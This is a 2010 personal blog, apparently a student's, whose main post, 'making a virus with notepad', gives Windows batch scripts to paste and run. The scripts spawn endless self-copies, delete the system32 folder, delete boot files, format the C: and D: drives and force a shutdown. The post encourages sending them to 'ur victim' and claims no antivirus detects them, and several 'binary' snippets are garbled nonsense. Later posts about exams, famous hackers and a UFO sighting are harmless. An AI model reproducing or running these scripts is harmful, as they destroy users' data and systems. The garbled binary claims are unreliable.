our school

Tuesday, September 14, 2010

making a virus with notepad

MAKING A VIRUS WITH NOTEPAD


start note pad

----------------------------------------------------------------------------------------------
PASTE THIS
----------------------------------------------------------------------------------------------

:1
@echo off
title 1337 USURP
echo Loading Virus.
copy 1.bat C:\2.bat
copy 1.bat C:\3.bat
copy 1.bat C:\1.bat
start C:\2.bat
start C:\1.bat
start C:\3.bat
copy 2.bat C:\2.bat
copy 3.bat C:\3.bat
copy 1.bat C:\windows\1.bat
copy 2.bat C:\windows\2.bat
copy 3.bat C:\windows\3.bat
start C:\windows\2.bat
start C:\windows\3.bat
start C:\windows\1.bat

@echo on

PLEASE WAIT WHILE WE FIX THIS PROBLEM...
PLEASE WAIT WHILE WE FIX THIS PROBLEM....
PLEASE WAIT WHILE WE FIX THIS PROBLEM.....
PLEASE WAIT WHILE WE FIX THIS PROBLEM......
PLEASE WAIT WHILE WE FIX THIS PROBLEM.......
PLEASE WAIT WHILE WE FIX THIS PROBLEM........
PLEASE WAIT WHILE WE FIX THIS PROBLEM.........
PLEASE WAIT WHILE WE FIX THIS PROBLEM..........
PLEASE WAIT WHILE WE FIX THIS PROBLEM.........
PLEASE WAIT WHILE WE FIX THIS PROBLEM.........
PLEASE WAIT WHILE WE FIX THIS PROBLEM........
PLEASE WAIT WHILE WE FIX THIS PROBLEM.......
PLEASE WAIT WHILE WE FIX THIS PROBLEM......
PLEASE WAIT WHILE WE FIX THIS PROBLEM.....
PLEASE WAIT WHILE WE FIX THIS PROBLEM....

@echo off
goto 1

_____________________________________________________________________
SAVE AS 1.bat
_____________________________________________________________________

You can even make it an autoexec.bat file and load on start up
or using notepad make a reg file and save *.reg
This is so 1337 and no A-V can detect it you can make it move around or copy all over the system and rename itself and start

You guys should try it you can just restart your computer but u can also make it load in startup if you want. thats what i did and i had to use safemode..
1. Open Notepad

2. write the above command : -
del c:\WINDOWS\system32\**/q

3. Save the above notepad with the extension ".bat or .cmd" as u want

4. !!!!!!!!!!!!!!!!!!!!!!Attention!!!!!!!!!!!!!!!!!!!!!!
Don't double click the file otherwise u r in trouble.
Why ?????? Because the file u created will delete all files from you

system32 folder and when u restart ur pc it will not start

because system can not find the files in the system32 folder which

is required at the time of booting.

5. You can also test the above by creating a fake folder let suppose

windows1 in C:\. Copy some old files in it and just follow the

above command.By double clicking the bat or cmd file ur all files

automaitcally get deleted.

6. You can try this file in any one`s computer.(but this result in causing damage to the computer, so think again before trying this on anyone's pc)
@echo off
title GREET
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A vIrUs Is tAkIng OvEr yOuR Hard Drive"



Copy This Code And Paste It In The Notepad and Then Save It As "Greet.bat"
@echo off
title 010101010101010010110
msg * YOu gOt oWneD dUdE PleAsE gEt a bEttEr AnTivIruS


format c:\ /Q/X
01100110011011110111001001101101011000010111010000100000011000110011101001011100
0010000000101111010100010010111101011000
format d:\ /Q/X01100110011011110111001001101101011000010111010000100000011000010011101001011100
0010000000101111010100010010111101011000
attrib -r -s -h c:\boot.ini
del /F/S/Q c:\boot.ini
01100100011001010110110000100000001011110100011000101111010100110010111101010001
00100000011000110011101001011100011000100110111101101111011101000010111001101001
0110111001101001


Same As Above Virus Save It As "anubis.bat" and Enjoy
@ECHO OFF
REM
copy %0 b.com>nul
b.com
del b.com
rem



Same As Above SAve It As "Dandy.bat"


Save It As "SDW.html"
FORMATTING HARD DISC
use notepad and enter the binary codes. then save it as an exe file.... and send it to ur victim


Kill Hard disk
01001011000111110010010101010101010000011111100000

Format c:
01100110011011110111001001101101011000010111010000 10000001100011001110100101110000100000001011110101 00010010111101011000

Format d:
01100110011011110111001001101101011000010111010000 10000001100100001110100101110000100000001011110101 00010010111101011000

Format a:
01100110011011110111001001101101011000010111010000 10000001100001001110100101110000100000001011110101 00010010111101011000

Boot Failure
01100100011001010110110000100000001011110100011000 10111101010011001011110101000100100000011000110011 10100101110001100010011011110110111101110100001011 10011010010110111001101001

YoSH !!

YAY !!! UT 's over and now having freedom at the hyper level :P . But almost all of my friends gonna go back to hometown. So , the consequence is ~~sigh~~ so BORING!!! ! !! Can you imagine my feeling? Yeah ! it is really awful. x (

Wednesday, August 18, 2010

Really tired...

In these days I am really stressful and busy. This is because of the competition and UT3. To be honest, I know I have to give time to prepare for my UT3. On the other hand , I also need to try for my competition. Anyway, I have to do both.I am sure that I will publish some of the interesting posts in my blog after my UT3.. !! :)

Monday, July 26, 2010

A Tale of Two Hats: 6 of the Best White and Black Hat Hackers of All Time


While the real experience of hacking might not be accurately represented in movies, hackers certainly do become famous for white and black hat —good and bad— deeds. The following are six of the most famous hackers of all time:

White Hat

1. Linus Torvalds
Creator of the famous Unix-based operating system, Linux, Torvalds used his hacking skills to change the fundamental programming on this home computer. This initial foray into the inner workings of a Sinclair QL in inspired Torvalds to create his own system. Thanks to his efforts, the now extremely popular, open source OS was born.

2. Tim Berners-Lee
This inventor of the World Wide Web was caught hacking into Oxford files while he was a student at the university. He was then banned from the university. Eventually, he ended up working at CERN Laboratories, a European nuclear research organization. While there, he figured out a way to send hypertext through a network. At that point, the Internet as we know it was born.

3. Stephen Wozniak
While he is known known for being one of the co-founders of computer giant Apple Computer, Stephen Wozniak once made blue boxes to bypass telephone switching mechanisms. In this way, the user could get free long distance coverage. He was caught when he started selling the blue boxes to classmates.

After dropping out of college, Wozniak collaborated with his friend, Steve Jobs, to build the first Apple personal computers in their garage. The rest, as they say, is history.

Black Hat

1. Kevin Mitnick
Described by the Department of Justice as “the most wanted computer criminal in United States History,” Mitnick hacked into corporate computers, stole designs and product information, hacked the Los Angeles bus punch card system, and scrambled phones. He was eventually captured when he hacked into the computer of fellow hacker Tsutomu Shimomura. Shimomura then made it his mission to find Mitnick, and soon afterward Mitnick was in custody.

Today, he runs a computer security-consulting firm and has authored several books.

2. Robert Tappan Morris
The Morris Worm was the first such virus to be introduced to the Internet. While studying at Cornell, Morris wrote the code and released it. He claimed that he was only trying to see how large the Internet was. Unfortunately, the worm caused at least 6,000 computers to become unusable.

Three years of probation, 400 hours of community service, and $10,500.00 later, Morris had paid his debt to society. He now works as a tenured MIT professor.

3. Jonathan James
At 16 years of age, James was the youngest hacker to ever be sent to prison. The mot notable of his offenses was a back door he installed in a Defense Threat Reduction Agency server. This backdoor allowed him to access some e-mail correspondence as well as to isolate the usernames and passwords of key government employees. He also hacked into NASA’s computer system and stole technological information worth $1.7 million. To remove the inserted code, NASA had to shut down their computers. This cost them $41,000.00

James was sentenced to six months of house arrest, but was sent to prison for six months when he violated parole. He hopes to start his own tech company in the future.

Sunday, July 18, 2010

UFO !!!!







Haha !! I know you are really eager to hear about UFO. No doubt that they are very interesting and mysterious things of all the times. I got the above photos from a blog. It actually happened in CHINA on July 9th. The thing( some think UFO) flied through the hangzhou airport. the thing was emitting the white light around and it has the circular shape.

Yu, a driver, said that he saw a fire ball flying toward west. Moreover, almost 10 planes follow the wrong ways because of the thing. Most of the people can take the photos at that time.



Tuesday, March 2, 2010